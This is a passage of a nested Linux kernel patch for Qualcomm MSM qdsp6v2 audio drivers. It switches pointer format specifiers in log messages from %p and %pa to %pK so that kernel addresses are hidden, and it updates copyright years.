- 		 cache_device, dev_map_idx);
--	pr_debug("%s: endp - %p %p\n",  __func__,
-+	pr_debug("%s: endp - %pK %pK\n",  __func__,
- 		 &ds2_dap_params[cache_device], ds2_ap_params_obj);
- 
- 	params_value = kzalloc(params_length, GFP_KERNEL);
-@@ -1189,7 +1189,7 @@ static int msm_ds2_dap_send_cached_params(int dev_map_idx,
- 	}
- 
- 	ds2_ap_params_obj = &ds2_dap_params[cache_device];
--	pr_debug("%s: cached param - %p %p, cache_device %d\n", __func__,
-+	pr_debug("%s: cached param - %pK %pK, cache_device %d\n", __func__,
- 		 &ds2_dap_params[cache_device], ds2_ap_params_obj,
- 		 cache_device);
- 	params_value = kzalloc(params_length, GFP_KERNEL);
-diff --git a/sound/soc/msm/qdsp6v2/msm-dts-eagle.c b/sound/soc/msm/qdsp6v2/msm-dts-eagle.c
-index 3a6a9c2..465947f 100644
---- a/sound/soc/msm/qdsp6v2/msm-dts-eagle.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dts-eagle.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2014-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2014-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -470,7 +470,7 @@ static int _sendcache_pre(struct audio_client *ac)
- 		err = -EINVAL;
- 	if ((_depc_size == 0) || !_depc || (size == 0) ||
- 		cmd == 0 || ((offset + size) > _depc_size) || (err != 0)) {
--		eagle_precache_err("%s: primary device %i cache index %i general error - cache size = %u, cache ptr = %p, offset = %u, size = %u, cmd = %i",
-+		eagle_precache_err("%s: primary device %i cache index %i general error - cache size = %u, cache ptr = %pK, offset = %u, size = %u, cmd = %i",
- 			__func__, _device_primary, cidx, _depc_size, _depc,
- 			offset, size, cmd);
- 		return -EINVAL;
-@@ -554,7 +554,7 @@ NT_MODE_GOTO:
- 		err = -EINVAL;
- 	if ((_depc_size == 0) || !_depc || (err != 0) || (size == 0) ||
- 		(cmd == 0) || (offset + size) > _depc_size) {
--		eagle_postcache_err("%s: primary device %i cache index %i port_id 0x%X general error - cache size = %u, cache ptr = %p, offset = %u, size = %u, cmd = %i",
-+		eagle_postcache_err("%s: primary device %i cache index %i port_id 0x%X general error - cache size = %u, cache ptr = %pK, offset = %u, size = %u, cmd = %i",
- 			__func__, _device_primary, cidx, port_id,
- 			_depc_size, _depc, offset, size, cmd);
- 		return -EINVAL;
-@@ -1042,7 +1042,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 		eagle_ioctl_info("%s: called with control 0x%X (allocate param cache)",
- 			__func__, cmd);
- 		if (copy_from_user((void *)&size, (void *)arg, sizeof(size))) {
--			eagle_ioctl_err("%s: error copying size (src:%p, tgt:%p, size:%zu)",
-+			eagle_ioctl_err("%s: error copying size (src:%pK, tgt:%pK, size:%zu)",
- 				__func__, (void *)arg, &size, sizeof(size));
- 			return -EFAULT;
- 		} else if (size > DEPC_MAX_SIZE) {
-@@ -1082,7 +1082,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 		eagle_ioctl_info("%s: control 0x%X (get param)",
- 			__func__, cmd);
- 		if (copy_from_user((void *)&depd, (void *)arg, sizeof(depd))) {
--			eagle_ioctl_err("%s: error copying dts_eagle_param_desc (src:%p, tgt:%p, size:%zu)",
-+			eagle_ioctl_err("%s: error copying dts_eagle_param_desc (src:%pK, tgt:%pK, size:%zu)",
- 				__func__, (void *)arg, &depd, sizeof(depd));
- 			return -EFAULT;
- 		}
-@@ -1153,7 +1153,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 		eagle_ioctl_info("%s: control 0x%X (set param)",
- 			__func__, cmd);
- 		if (copy_from_user((void *)&depd, (void *)arg, sizeof(depd))) {
--			eagle_ioctl_err("%s: error copying dts_eagle_param_desc (src:%p, tgt:%p, size:%zu)",
-+			eagle_ioctl_err("%s: error copying dts_eagle_param_desc (src:%pK, tgt:%pK, size:%zu)",
- 				__func__, (void *)arg, &depd, sizeof(depd));
- 			return -EFAULT;
- 		}
-@@ -1186,7 +1186,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 		if (copy_from_user((void *)&_depc[offset],
- 				   (void *)(((char *)arg)+sizeof(depd)),
- 					depd.size)) {
--			eagle_ioctl_err("%s: error copying param to cache (src:%p, tgt:%p, size:%u)",
-+			eagle_ioctl_err("%s: error copying param to cache (src:%pK, tgt:%pK, size:%u)",
- 				__func__, ((char *)arg)+sizeof(depd),
- 				&_depc[offset], depd.size);
- 			return -EFAULT;
-@@ -1205,7 +1205,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 		eagle_ioctl_info("%s: with control 0x%X (set param cache block)",
- 			 __func__, cmd);
- 		if (copy_from_user((void *)b_, (void *)arg, sizeof(b_))) {
--			eagle_ioctl_err("%s: error copying cache block data (src:%p, tgt:%p, size:%zu)",
-+			eagle_ioctl_err("%s: error copying cache block data (src:%pK, tgt:%pK, size:%zu)",
- 				__func__, (void *)arg, b_, sizeof(b_));
- 			return -EFAULT;
- 		}
-@@ -1236,7 +1236,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 		eagle_ioctl_dbg("%s: with control 0x%X (set active device)",
- 			 __func__, cmd);
- 		if (copy_from_user((void *)data, (void *)arg, sizeof(data))) {
--			eagle_ioctl_err("%s: error copying active device data (src:%p, tgt:%p, size:%zu)",
-+			eagle_ioctl_err("%s: error copying active device data (src:%pK, tgt:%pK, size:%zu)",
- 				__func__, (void *)arg, data, sizeof(data));
- 			return -EFAULT;
- 		}
-@@ -1258,7 +1258,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 			 __func__, cmd);
- 		if (copy_from_user((void *)&target, (void *)arg,
- 				   sizeof(target))) {
--			eagle_ioctl_err("%s: error reading license index. (src:%p, tgt:%p, size:%zu)",
-+			eagle_ioctl_err("%s: error reading license index. (src:%pK, tgt:%pK, size:%zu)",
- 				__func__, (void *)arg, &target, sizeof(target));
- 			return -EFAULT;
- 		}
-@@ -1305,7 +1305,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 				cmd);
- 		if (copy_from_user((void *)target, (void *)arg,
- 				   sizeof(target))) {
--			eagle_ioctl_err("%s: error reading license index (src:%p, tgt:%p, size:%zu)",
-+			eagle_ioctl_err("%s: error reading license index (src:%pK, tgt:%pK, size:%zu)",
- 				__func__, (void *)arg, target, sizeof(target));
- 			return -EFAULT;
- 		}
-@@ -1348,7 +1348,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 				(void *)&(((u32 *)_sec_blob[target[0]])[1]),
- 				(void *)(((char *)arg)+sizeof(target)),
- 				target[1])) {
--			eagle_ioctl_err("%s: error copying license to index %u, size %u (src:%p, tgt:%p, size:%u)",
-+			eagle_ioctl_err("%s: error copying license to index %u, size %u (src:%pK, tgt:%pK, size:%u)",
- 					__func__, target[0], target[1],
- 					((char *)arg)+sizeof(target),
- 					&(((u32 *)_sec_blob[target[0]])[1]),
-@@ -1365,7 +1365,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 				cmd);
- 		if (copy_from_user((void *)&target, (void *)arg,
- 				   sizeof(target))) {
--			eagle_ioctl_err("%s: error reading license index (src:%p, tgt:%p, size:%zu)",
-+			eagle_ioctl_err("%s: error reading license index (src:%pK, tgt:%pK, size:%zu)",
- 				__func__, (void *)arg, &target, sizeof(target));
- 			return -EFAULT;
- 		}
-@@ -1395,7 +1395,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 				__func__, cmd);
- 		if (copy_from_user((void *)&spec, (void *)arg,
- 					sizeof(spec))) {
--			eagle_ioctl_err("%s: error reading volume command specifier (src:%p, tgt:%p, size:%zu)",
-+			eagle_ioctl_err("%s: error reading volume command specifier (src:%pK, tgt:%pK, size:%zu)",
- 				__func__, (void *)arg, &spec, sizeof(spec));
- 			return -EFAULT;
- 		}
-@@ -1417,7 +1417,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 			if (copy_from_user((void *)&_vol_cmds_d[idx],
- 					(void *)(((char *)arg) + sizeof(int)),
- 					sizeof(struct vol_cmds_d))) {
--				eagle_ioctl_err("%s: error reading volume command descriptor (src:%p, tgt:%p, size:%zu)",
-+				eagle_ioctl_err("%s: error reading volume command descriptor (src:%pK, tgt:%pK, size:%zu)",
- 					__func__, ((char *)arg) + sizeof(int),
- 					&_vol_cmds_d[idx],
- 					sizeof(struct vol_cmds_d));
-@@ -1430,7 +1430,7 @@ int msm_dts_eagle_ioctl(unsigned int cmd, unsigned long arg)
- 			if (copy_from_user((void *)_vol_cmds[idx],
- 					(void *)(((char *)arg) + (sizeof(int) +
- 					sizeof(struct vol_cmds_d))), size)) {
--				eagle_ioctl_err("%s: error reading volume command string (src:%p, tgt:%p, size:%i)",
-+				eagle_ioctl_err("%s: error reading volume command string (src:%pK, tgt:%pK, size:%i)",
- 					__func__, ((char *)arg) + (sizeof(int) +
- 					sizeof(struct vol_cmds_d)),
- 					_vol_cmds[idx], size);
-diff --git a/sound/soc/msm/qdsp6v2/msm-dts-srs-tm-config.c b/sound/soc/msm/qdsp6v2/msm-dts-srs-tm-config.c
-index ddfbcec..7c35d19 100644
---- a/sound/soc/msm/qdsp6v2/msm-dts-srs-tm-config.c
-+++ b/sound/soc/msm/qdsp6v2/msm-dts-srs-tm-config.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014, 2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -292,7 +292,7 @@ static int reg_ion_mem(void)
- 				 &po.kvaddr);
- 	if (rc != 0)
- 		pr_err("%s: failed to allocate memory.\n", __func__);
--		pr_debug("%s: exited ion_client = %p, ion_handle = %p, phys_addr = %lu, length = %d, vaddr = %p, rc = 0x%x\n",
-+		pr_debug("%s: exited ion_client = %pK, ion_handle = %pK, phys_addr = %lu, length = %d, vaddr = %pK, rc = 0x%x\n",
- 			__func__, ion_client, ion_handle, (long)po.paddr,
- 			(unsigned int)po.size, po.kvaddr, rc);
- 	return rc;
-diff --git a/sound/soc/msm/qdsp6v2/msm-lsm-client.c b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-index 79b92f6..32a16bf 100644
---- a/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-+++ b/sound/soc/msm/qdsp6v2/msm-lsm-client.c
-@@ -1,5 +1,5 @@
- /*
-- * Copyright (c) 2013-2015, Linux Foundation. All rights reserved.
-+ * Copyright (c) 2013-2016, Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -95,7 +95,7 @@ static int msm_lsm_queue_lab_buffer(struct lsm_priv *prtd, int i)
- 	struct snd_soc_pcm_runtime *rtd;
- 
- 	if (!prtd || !prtd->lsm_client) {
--		pr_err("%s: Invalid params prtd %p lsm client %p\n",
-+		pr_err("%s: Invalid params prtd %pK lsm client %pK\n",
- 			__func__, prtd, ((!prtd) ? NULL : prtd->lsm_client));
- 		return -EINVAL;
- 	}
-@@ -109,7 +109,7 @@ static int msm_lsm_queue_lab_buffer(struct lsm_priv *prtd, int i)
- 	if (!prtd->lsm_client->lab_buffer ||
- 		i >= prtd->lsm_client->hw_params.period_count) {
- 		dev_err(rtd->dev,
--			"%s: Lab buffer not setup %p incorrect index %d period count %d\n",
-+			"%s: Lab buffer not setup %pK incorrect index %d period count %d\n",
- 			__func__, prtd->lsm_client->lab_buffer, i,
- 			prtd->lsm_client->hw_params.period_count);
- 		return -EINVAL;
-@@ -136,7 +136,7 @@ static int lsm_lab_buffer_sanity(struct lsm_priv *prtd,
- 	struct snd_soc_pcm_runtime *rtd;
- 
- 	if (!prtd || !read_done || !index) {
--		pr_err("%s: Invalid params prtd %p read_done %p index %p\n",
-+		pr_err("%s: Invalid params prtd %pK read_done %pK index %pK\n",
- 			__func__, prtd, read_done, index);
- 		return -EINVAL;
- 	}
-@@ -150,7 +150,7 @@ static int lsm_lab_buffer_sanity(struct lsm_priv *prtd,
- 
- 	if (!prtd->lsm_client->lab_enable || !prtd->lsm_client->lab_buffer) {
- 		dev_err(rtd->dev,
--			"%s: Lab not enabled %d invalid lab buffer %p\n",
-+			"%s: Lab not enabled %d invalid lab buffer %pK\n",
- 			__func__, prtd->lsm_client->lab_enable,
- 			prtd->lsm_client->lab_buffer);
- 		return -EINVAL;
-@@ -164,7 +164,7 @@ static int lsm_lab_buffer_sanity(struct lsm_priv *prtd,
- 			(prtd->lsm_client->lab_buffer[i].mem_map_handle ==
- 			read_done->mem_map_handle)) {
- 			dev_dbg(rtd->dev,
--				"%s: Buffer found %pa memmap handle %d\n",
-+				"%s: Buffer found %pK memmap handle %d\n",
- 				__func__, &prtd->lsm_client->lab_buffer[i].phys,
- 			prtd->lsm_client->lab_buffer[i].mem_map_handle);
- 			if (read_done->total_size >
-@@ -211,7 +211,7 @@ static void lsm_event_handler(uint32_t opcode, uint32_t token,
- 		if (prtd->lsm_client->session != token ||
- 		    !read_done) {
- 			dev_err(rtd->dev,
--				"%s: EVENT_READ_DONE invalid callback, session %d callback %d payload %p",
-+				"%s: EVENT_READ_DONE invalid callback, session %d callback %d payload %pK",
- 				__func__, prtd->lsm_client->session,
- 				token, read_done);
- 			return;
-@@ -310,7 +310,7 @@ static int msm_lsm_lab_buffer_alloc(struct lsm_priv *lsm, int alloc)
- 	int ret = 0;
- 	struct snd_dma_buffer *dma_buf = NULL;
- 	if (!lsm) {
--		pr_err("%s: Invalid param lsm %p\n", __func__, lsm);
-+		pr_err("%s: Invalid param lsm %pK\n", __func__, lsm);
- 		return -EINVAL;
- 	}
- 	if (alloc) {
-@@ -778,7 +778,7 @@ static int msm_lsm_ioctl_shared(struct snd_pcm_substream *substream,
- 			   snd_model_v2.data, snd_model_v2.data_size)) {
- 			dev_err(rtd->dev,
- 				"%s: copy from user data failed\n"
--			       "data %p size %d\n", __func__,
-+			       "data %pK size %d\n", __func__,
- 			       snd_model_v2.data, snd_model_v2.data_size);
- 			q6lsm_snd_model_buf_free(prtd->lsm_client);
- 			rc = -EFAULT;
-@@ -1798,7 +1798,7 @@ static int msm_lsm_hw_params(struct snd_pcm_substream *substream,
- 
- 	if (!prtd || !params) {
- 		dev_err(rtd->dev,
--			"%s: invalid params prtd %p params %p",
-+			"%s: invalid params prtd %pK params %pK",
- 			 __func__, prtd, params);
- 		return -EINVAL;
- 	}
-@@ -1840,7 +1840,7 @@ static snd_pcm_uframes_t msm_lsm_pcm_pointer(
- 
- 	if (!prtd) {
- 		dev_err(rtd->dev,
--			"%s: Invalid param %p\n", __func__, prtd);
-+			"%s: Invalid param %pK\n", __func__, prtd);
- 		return 0;
- 	}
- 
-@@ -1868,7 +1868,7 @@ static int msm_lsm_pcm_copy(struct snd_pcm_substream *substream, int ch,
- 
- 	if (!prtd) {
- 		dev_err(rtd->dev,
--			"%s: Invalid param %p\n", __func__, prtd);
-+			"%s: Invalid param %pK\n", __func__, prtd);
- 		return -EINVAL;
- 	}
- 
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-index 84c21f4a1..f1c96ef 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-afe-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
- *
- * This program is free software; you can redistribute it and/or modify
- * it under the terms of the GNU General Public License version 2 and
-@@ -387,7 +387,7 @@ static int msm_afe_open(struct snd_pcm_substream *substream)
- 		pr_err("Failed to allocate memory for msm_audio\n");
- 		return -ENOMEM;
- 	} else
--		pr_debug("prtd %p\n", prtd);
-+		pr_debug("prtd %pK\n", prtd);
- 
- 	mutex_init(&prtd->lock);
- 	spin_lock_init(&prtd->dsp_lock);
-@@ -606,7 +606,7 @@ static int msm_afe_hw_params(struct snd_pcm_substream *substream,
- 		return -ENOMEM;
- 	}
- 
--	pr_debug("%s:buf = %p\n", __func__, buf);
-+	pr_debug("%s:buf = %pK\n", __func__, buf);
- 	dma_buf->dev.type = SNDRV_DMA_TYPE_DEV;
- 	dma_buf->dev.dev = substream->pcm->card->dev;
- 	dma_buf->private_data = NULL;
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-host-voice-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-host-voice-v2.c
-index c190977..1dd18c6 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-host-voice-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-host-voice-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2013-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2013-2014, 2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -504,7 +504,7 @@ static int hpcm_allocate_shared_memory(struct hpcm_drv *prtd)
- 
- 	sess->tp_mem_table.size = sizeof(struct vss_imemory_table_t);
- 
--	pr_debug("%s: data %p phys %pa\n", __func__,
-+	pr_debug("%s: data %pK phys %pK\n", __func__,
- 		 sess->tp_mem_table.data, &sess->tp_mem_table.phys);
- 
- 	/* Split 4096 block into four 1024 byte blocks for each dai */
-@@ -682,7 +682,7 @@ void hpcm_notify_evt_processing(uint8_t *data, char *session,
- 	}
- 
- 	if (tp == NULL || tmd == NULL) {
--		pr_err("%s: tp = %p or tmd = %p is null\n", __func__,
-+		pr_err("%s: tp = %pK or tmd = %pK is null\n", __func__,
- 		       tp, tmd);
- 
- 		return;
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-index 64d3fe0..ad7e114 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-lpa-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2014, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2014, 2016 The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -132,7 +132,7 @@ static void event_handler(uint32_t opcode,
- 		pr_debug("%s:writing %d bytes of buffer[%d] to dsp 2\n",
- 				__func__, prtd->pcm_count, prtd->out_head);
- 		temp = buf[0].phys + (prtd->out_head * prtd->pcm_count);
--		pr_debug("%s:writing buffer[%d] from 0x%pa\n",
-+		pr_debug("%s:writing buffer[%d] from 0x%pK\n",
- 				__func__, prtd->out_head, &temp);
- 		if (prtd->meta_data_mode) {
- 			memcpy(&output_meta_data, (char *)(buf->data +
-@@ -623,7 +623,7 @@ static int msm_pcm_hw_params(struct snd_pcm_substream *substream,
- 	if (buf == NULL || buf[0].data == NULL)
- 		return -ENOMEM;
- 
--	pr_debug("%s:buf = %p\n", __func__, buf);
-+	pr_debug("%s:buf = %pK\n", __func__, buf);
- 	dma_buf->dev.type = SNDRV_DMA_TYPE_DEV;
- 	dma_buf->dev.dev = substream->pcm->card->dev;
- 	dma_buf->private_data = NULL;
-diff --git a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-index 4eb3f2a..37461db 100644
---- a/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-+++ b/sound/soc/msm/qdsp6v2/msm-pcm-q6-v2.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -746,7 +746,7 @@ static int msm_pcm_capture_copy(struct snd_pcm_substream *substream,
- 		pr_debug("%s: pcm stopped in_count 0\n", __func__);
- 		return 0;
- 	}
--	pr_debug("Checking if valid buffer is available...%p\n",
-+	pr_debug("Checking if valid buffer is available...%pK\n",
- 						data);
- 	data = q6asm_is_cpu_buf_avail(OUT, prtd->audio_client, &size, &idx);
- 	bufptr = data;
-@@ -903,7 +903,7 @@ static int msm_pcm_hw_params(struct snd_pcm_substream *substream,
- 	if (buf == NULL || buf[0].data == NULL)
- 		return -ENOMEM;
- 
--	pr_debug("%s:buf = %p\n", __func__, buf);
-+	pr_debug("%s:buf = %pK\n", __func__, buf);
- 	dma_buf->dev.type = SNDRV_DMA_TYPE_DEV;
- 	dma_buf->dev.dev = substream->pcm->card->dev;
- 	dma_buf->private_data = NULL;
-diff --git a/sound/soc/msm/qdsp6v2/q6adm.c b/sound/soc/msm/qdsp6v2/q6adm.c
-index 5d0fd0d..f029594 100644
---- a/sound/soc/msm/qdsp6v2/q6adm.c
-+++ b/sound/soc/msm/qdsp6v2/q6adm.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -378,7 +378,7 @@ int adm_dts_eagle_get(int port_id, int copp_idx, int param_id,
- 	}
- 
- 	if ((size == 0) || !data) {
--		pr_err("DTS_EAGLE_ADM: %s - invalid size %u or pointer %p.\n",
-+		pr_err("DTS_EAGLE_ADM: %s - invalid size %u or pointer %pK.\n",
- 			__func__, size, data);
- 		return -EINVAL;
- 	}
-@@ -1246,7 +1246,7 @@ static int32_t adm_callback(struct apr_client_data *data, void *priv)
- 	payload = data->payload;
- 
- 	if (data->opcode == RESET_EVENTS) {
--		pr_debug("%s: Reset event is received: %d %d apr[%p]\n",
-+		pr_debug("%s: Reset event is received: %d %d apr[%pK]\n",
- 			__func__,
- 			data->reset_event, data->reset_proc, this_adm.apr);
- 		if (this_adm.apr) {
-@@ -1739,7 +1739,7 @@ static void remap_cal_data(struct cal_block_data *cal_block, int cal_index)
- 			pr_err("%s: ADM mmap did not work! size = %zd ret %d\n",
- 				__func__,
- 				cal_block->map_data.map_size, ret);
--			pr_debug("%s: ADM mmap did not work! addr = 0x%pa, size = %zd ret %d\n",
-+			pr_debug("%s: ADM mmap did not work! addr = 0x%pK, size = %zd ret %d\n",
- 				__func__,
- 				&cal_block->cal_data.paddr,
- 				cal_block->map_data.map_size, ret);
-@@ -1802,7 +1802,7 @@ static void send_adm_custom_topology(void)
- 
- 	atomic_set(&this_adm.adm_stat, 0);
- 	atomic_set(&this_adm.adm_cmd_err_code, 0);
--	pr_debug("%s: Sending ADM_CMD_ADD_TOPOLOGIES payload = 0x%pa, size = %d\n",
-+	pr_debug("%s: Sending ADM_CMD_ADD_TOPOLOGIES payload = 0x%pK, size = %d\n",
- 		__func__, &cal_block->cal_data.paddr,
- 		adm_top.payload_size);
- 	result = apr_send_pkt(this_adm.apr, (uint32_t *)&adm_top);
-@@ -1892,14 +1892,14 @@ static int send_adm_cal_block(int port_id, int copp_idx,
- 
- 	atomic_set(&this_adm.copp.stat[port_idx][copp_idx], 0);
- 	atomic_set(&this_adm.copp.cmd_err_code[port_idx][copp_idx], 0);
--	pr_debug("%s: Sending SET_PARAMS payload = 0x%pa, size = %d\n",
-+	pr_debug("%s: Sending SET_PARAMS payload = 0x%pK, size = %d\n",
- 		__func__, &cal_block->cal_data.paddr,
- 		adm_params.payload_size);
- 	result = apr_send_pkt(this_adm.apr, (uint32_t *)&adm_params);
- 	if (result < 0) {
- 		pr_err("%s: Set params failed port 0x%x result %d\n",
- 				__func__, port_id, result);
--		pr_debug("%s: Set params failed port = 0x%x payload = 0x%pa result %d\n",
-+		pr_debug("%s: Set params failed port = 0x%x payload = 0x%pK result %d\n",
- 			__func__, port_id, &cal_block->cal_data.paddr, result);
- 		result = -EINVAL;
- 		goto done;
-@@ -1911,7 +1911,7 @@ static int send_adm_cal_block(int port_id, int copp_idx,
- 	if (!result) {
- 		pr_err("%s: Set params timed out port = 0x%x\n",
- 				__func__, port_id);
--		pr_debug("%s: Set params timed out port = 0x%x, payload = 0x%pa\n",
-+		pr_debug("%s: Set params timed out port = 0x%x, payload = 0x%pK\n",
- 			__func__, port_id, &cal_block->cal_data.paddr);
- 		result = -EINVAL;
- 		goto done;
-@@ -2352,7 +2352,7 @@ int adm_open(int port_id, int path, int rate, int channel_mode, int topology,
- 		res = adm_memory_map_regions(&this_adm.outband_memmap.paddr, 0,
- 		(uint32_t *)&this_adm.outband_memmap.size, 1);
- 		if (res < 0) {
--			pr_err("%s: SRS adm_memory_map_regions failed ! addr = 0x%p, size = %d\n",
-+			pr_err("%s: SRS adm_memory_map_regions failed ! addr = 0x%pK, size = %d\n",
- 			 __func__, (void *)this_adm.outband_memmap.paddr,
- 		(uint32_t)this_adm.outband_memmap.size);
- 		}
-@@ -2781,7 +2781,7 @@ int adm_map_rtac_block(struct rtac_cal_block_data *cal_block)
- 		pr_err("%s: RTAC mmap did not work! size = %d result %d\n",
- 			__func__,
- 			cal_block->map_data.map_size, result);
--		pr_debug("%s: RTAC mmap did not work! addr = 0x%pa, size = %d\n",
-+		pr_debug("%s: RTAC mmap did not work! addr = 0x%pK, size = %d\n",
- 			__func__,
- 			&cal_block->cal_data.paddr,
- 			cal_block->map_data.map_size);
-@@ -3963,7 +3963,7 @@ static int adm_source_tracking_alloc_map_memory(void)
- 			(uint32_t *)&this_adm.sourceTrackingData.memmap.size,
- 			1);
- 	if (ret < 0) {
--		pr_err("%s: failed to map memory, paddr = 0x%p, size = %d\n",
-+		pr_err("%s: failed to map memory, paddr = 0x%pK, size = %d\n",
- 			__func__,
- 			(void *)this_adm.sourceTrackingData.memmap.paddr,
- 			(uint32_t)this_adm.sourceTrackingData.memmap.size);
-@@ -3983,7 +3983,7 @@ static int adm_source_tracking_alloc_map_memory(void)
- 		goto done;
- 	}
- 	ret = 0;
--	pr_debug("%s: paddr = 0x%p, size = %d, mem_map_handle = 0x%x\n",
-+	pr_debug("%s: paddr = 0x%pK, size = %d, mem_map_handle = 0x%x\n",
- 		  __func__, (void *)this_adm.sourceTrackingData.memmap.paddr,
- 		  (uint32_t)this_adm.sourceTrackingData.memmap.size,
- 		  atomic_read(&this_adm.mem_map_handles
-diff --git a/sound/soc/msm/qdsp6v2/q6afe.c b/sound/soc/msm/qdsp6v2/q6afe.c
-index 860aab8..e5c7347 100644
---- a/sound/soc/msm/qdsp6v2/q6afe.c
-+++ b/sound/soc/msm/qdsp6v2/q6afe.c
-@@ -1,4 +1,4 @@
--/* Copyright (c) 2012-2015, The Linux Foundation. All rights reserved.
-+/* Copyright (c) 2012-2016, The Linux Foundation. All rights reserved.
-  *
-  * This program is free software; you can redistribute it and/or modify
-  * it under the terms of the GNU General Public License version 2 and
-@@ -167,7 +167,7 @@ static int32_t afe_callback(struct apr_client_data *data, void *priv)
- 		return -EINVAL;
- 	}
- 	if (data->opcode == RESET_EVENTS) {
--		pr_debug("%s: reset event = %d %d apr[%p]\n",
-+		pr_debug("%s: reset event = %d %d apr[%pK]\n",
- 			__func__,
- 			data->reset_event, data->reset_proc, this_afe.apr);
- 
-@@ -202,7 +202,7 @@ static int32_t afe_callback(struct apr_client_data *data, void *priv)
- 
- 		if ((data->payload_size < sizeof(this_afe.calib_data))
- 			|| !payload || (data->token >= AFE_MAX_PORTS)) {
--			pr_err("%s: Error: size %d payload %p token %d\n",
-+			pr_err("%s: Error: size %d payload %pK token %d\n",
- 				__func__, data->payload_size,
- 				payload, data->token);
- 			return -EINVAL;
-@@ -541,7 +541,7 @@ static int afe_send_cal_block(u16 port_id, struct cal_block_data *cal_block)
- 		populate_upper_32_bits(cal_block->cal_data.paddr);
- 	afe_cal.param.mem_map_handle = cal_block->map_data.q6map_handle;
- 
--	pr_debug("%s: AFE cal sent for device port = 0x%x, cal size = %zd, cal addr = 0x%pa\n",
-+	pr_debug("%s: AFE cal sent for device port = 0x%x, cal size = %zd, cal addr = 0x%pK\n",
- 		__func__, port_id,
- 		cal_block->cal_data.size, &cal_block->cal_data.paddr);
- 
-@@ -586,7 +586,7 @@ static int afe_send_custom_topology_block(struct cal_block_data *cal_block)
- 		populate_upper_32_bits(cal_block->cal_data.paddr);
- 	afe_cal.mem_map_handle = cal_block->map_data.q6map_handle;
- 
--	pr_debug("%s:cmd_id:0x%x calsize:%zd memmap_hdl:0x%x caladdr:0x%pa",
-+	pr_debug("%s:cmd_id:0x%x calsize:%zd memmap_hdl:0x%x caladdr:0x%pK",
- 		__func__, AFE_CMD_ADD_TOPOLOGIES, cal_block->cal_data.size,
- 		afe_cal.mem_map_handle, &cal_block->cal_data.paddr);
- 
-@@ -1090,7 +1090,7 @@ static void remap_cal_data(struct cal_block_data *cal_block, int cal_index)
- 			pr_err("%s: mmap did not work! size = %zd ret %d\n",
- 				__func__,
- 				cal_block->map_data.map_size, ret);
--			pr_debug("%s: mmap did not work! addr = 0x%pa, size = %zd\n",
-+			pr_debug("%s: mmap did not work! addr = 0x%pK, size = %zd\n",
- 				__func__,
- 				&cal_block->cal_data.paddr,
- 				cal_block->map_data.map_size);
